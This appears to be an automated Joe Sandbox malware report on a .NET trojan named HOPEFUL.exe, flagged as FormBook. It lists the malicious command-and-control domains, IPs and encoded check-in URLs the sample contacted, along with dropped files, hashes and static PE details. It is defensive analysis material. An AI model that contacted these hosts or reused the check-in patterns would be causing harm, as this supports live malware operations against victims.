http://www.registeredagentfirm.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
registeredagentfirm.com | 34.98.99.30 | true | true | | unknown
tiendazoom.com | 174.136.37.109 | true | true | | unknown
www.the343radio.com | 35.169.40.107 | true | true | | unknown
eaglesnestpropheticministry.com | 34.102.136.180 | true | true | | unknown
www.tiendazoom.com | unknown | unknown | true | | unknown
www.registeredagentfirm.com | unknown | unknown | true | | unknown
www.eaglesnestpropheticministry.com | unknown | unknown | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.registeredagentfirm.com/jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP | true | Avira URL Cloud: safe | unknown
http://www.tiendazoom.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p | true | Avira URL Cloud: safe | unknown
http://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.the343radio.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.novergi.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eaglesnestpropheticministry.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.bebywye.site/jqc/www.ip-freight.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.the343radio.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.weddingmustgoon.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.11sxsx.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.ip-freight.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ip-freight.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.eaglesnestpropheticministry.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.novergi.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.theorangepearl.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lhc965.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.registeredagentfirm.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.weddingmustgoon.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.internetmarkaching.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kenniscourtureconsignments.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.weddingmustgoon.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.founder.com.cn/cn/cThe | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.strahlenschutz.digital/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://fontfabrik.com | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.internetmarkaching.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiendazoom.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.topheadlinetowitness-today.infoReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.novergi.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.theorangepearl.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.novergi.com/jqc/M | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiendazoom.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ip-freight.com/jqc/www.toweroflifeinc.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.theorangepearl.com/jqc/www.11sxsx.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.strahlenschutz.digitalReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.11sxsx.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.ip-freight.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.strahlenschutz.digital | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.topheadlinetowitness-today.info | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.toweroflifeinc.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.topheadlinetowitness-today.info/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kenniscourtureconsignments.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bebywye.siteReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lhc965.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.toweroflifeinc.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bebywye.site/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bebywye.site | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lhc965.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.the343radio.com/jqc/www.registeredagentfirm.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.toweroflifeinc.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.registeredagentfirm.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiendazoom.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.11sxsx.com/jqc/www.lhc965.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kenniscourtureconsignments.comReferer: | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.registeredagentfirm.com/jqc/ | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com | explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | false | |
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.11sxsx.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.strahlenschutz.digital/jqc/www.theorangepearl.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.theorangepearl.comReferer:explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.eaglesnestpropheticministry.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tiendazoom.com/jqc/www.eaglesnestpropheticministry.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.kenniscourtureconsignments.com/jqc/www.novergi.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.weddingmustgoon.com/jqc/www.bebywye.siteexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.internetmarkaching.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.registeredagentfirm.com/jqc/www.tiendazoom.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.the343radio.comReferer:explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
174.136.37.109 | unknown | United States | 33494 | IHNETUS | true
35.169.40.107 | unknown | United States | 14618 | AMAZON-AESUS | true
34.98.99.30 | unknown | United States | 15169 | GOOGLEUS | true

                                            General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 339365
Start date: 13.01.2021
Start time: 21:41:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: HOPEFUL.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@4/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 15.4% (good quality ratio 14.1%)
• Quality average: 73.8%
• Quality standard deviation: 30.6%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 13.64.90.137, 52.255.188.83, 51.104.139.180, 23.210.248.85, 92.122.213.247, 92.122.213.194, 8.248.149.254, 8.253.95.249, 8.253.204.121, 67.26.75.254, 67.26.137.254, 51.103.5.159, 52.155.217.156, 20.54.26.129, 51.104.144.132
                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/339365/sample/HOPEFUL.exe

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
21:47:42 | API Interceptor | 215x Sleep call for process: HOPEFUL.exe modified

                                            Joe Sandbox View / Context

                                            IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                            Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                            ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                    Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HOPEFUL.exe.log
Process: C:\Users\user\Desktop\HOPEFUL.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1451
Entropy (8bit): 5.345862727722058
Encrypted: false
SSDEEP: 24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84G1qE4j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovGm
MD5: 06F54CDBFEF62849AF5AE052722BD7B6
SHA1: FB0250AAC2057D0B5BCE4CE130891E428F28DA05
SHA-256: 4C039B93A728B546F49C47ED8B448D40A3553CDAABB147067AEE3958133CB446
SHA-512: 34EF5F6D5EAB0E5B11AC81F0D72FC56304291EDEEF6D19DF7145FDECAB5D342767DBBC0B4384B8DECB5741E6B85A4B431DF14FBEB5DDF2DEE103064D2895EABB
Malicious: true
Reputation: moderate, very likely benign file
                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Process:C:\Users\user\Desktop\HOPEFUL.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):42080
                                                                                    Entropy (8bit):6.2125074198825105
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                                    MD5:F2A47587431C466535F3C3D3427724BE
                                                                                    SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                                    SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                                    SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: BLESSINGS.exe, Detection: malicious, Browse
                                                                                    • Filename: QP-0766.scr.exe, Detection: malicious, Browse
                                                                                    • Filename: order-181289654312464648.exe, Detection: malicious, Browse
                                                                                    • Filename: PO_60577.exe, Detection: malicious, Browse
                                                                                    • Filename: IMG_73344332#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                                    • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                                                                    • Filename: Doc#6620200947535257653.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Generic.mg.15368412abd71685.exe, Detection: malicious, Browse
                                                                                    • Filename: RT-05723.exe, Detection: malicious, Browse
                                                                                    • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: cFAWQ1mv83.exe, Detection: malicious, Browse
                                                                                    • Filename: I7313Y5Rr2.exe, Detection: malicious, Browse
                                                                                    • Filename: SWIFT-COPY Payment advice3243343.exe, Detection: malicious, Browse
                                                                                    • Filename: bWVvaTptgL.exe, Detection: malicious, Browse
                                                                                    • Filename: umOXxQ9PFS.exe, Detection: malicious, Browse
                                                                                    • Filename: BL,IN&PL.exe, Detection: malicious, Browse
                                                                                    • Filename: ORDER #0554.exe, Detection: malicious, Browse
                                                                                    • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: IMG_84755643#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                                    • Filename: 8WLxD8uxRN.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.485992003606985
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: HOPEFUL.exe
File size: 3437056
MD5: 9c15af175868121cc014666189d52dae
SHA1: 3ba03f47a8762368538e47806353f55da43d46ac
SHA256: 7c8f873fc34661a785875f76a1f3b1aff6719e69d2a4ea5d2d94f849282b623a
SHA512: 48fb5c66bda58fa8b76e276e61afc36576cddb9e27a601767e10f2d554c669613249aca6908191cb30a850b8ef207a69bb1a73c1fe25c93e7ef40379a3950a02
SSDEEP: 98304:KVYMenFZrSmVobxfPUp75Xr6/UUyRGSG:KVYMejQ5cnE

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x74847e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp: 0x50A34A16 [Wed Nov 14 07:36:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x348428 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34a000 | 0x632 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x34c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x346484 | 0x346600 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x34a000 | 0x632 | 0x800 | False | 0.35595703125 | data | 3.69840070371 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x34c000 | 0xc | 0x200 | False | 0.041015625 | data | 0.0940979256627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x34a0a0 | 0x3a8 | data | |
RT_MANIFEST | 0x34a448 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2014 B6:HF663F:=754JC@:4:85B
Assembly Version | 1.0.0.0
InternalName | HOPEFUL.exe
FileVersion | 8.12.16.20
CompanyName | B6:HF663F:=754JC@:4:85B
Comments | =G5HB;3;JB3AHC8A5B4
ProductName | JFB=@6=@D8H94@H53JCD
ProductVersion | 8.12.16.20
FileDescription | JFB=@6=@D8H94@H53JCD
OriginalFilename | HOPEFUL.exe

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    01/13/21-21:49:23.525067TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.335.169.40.107
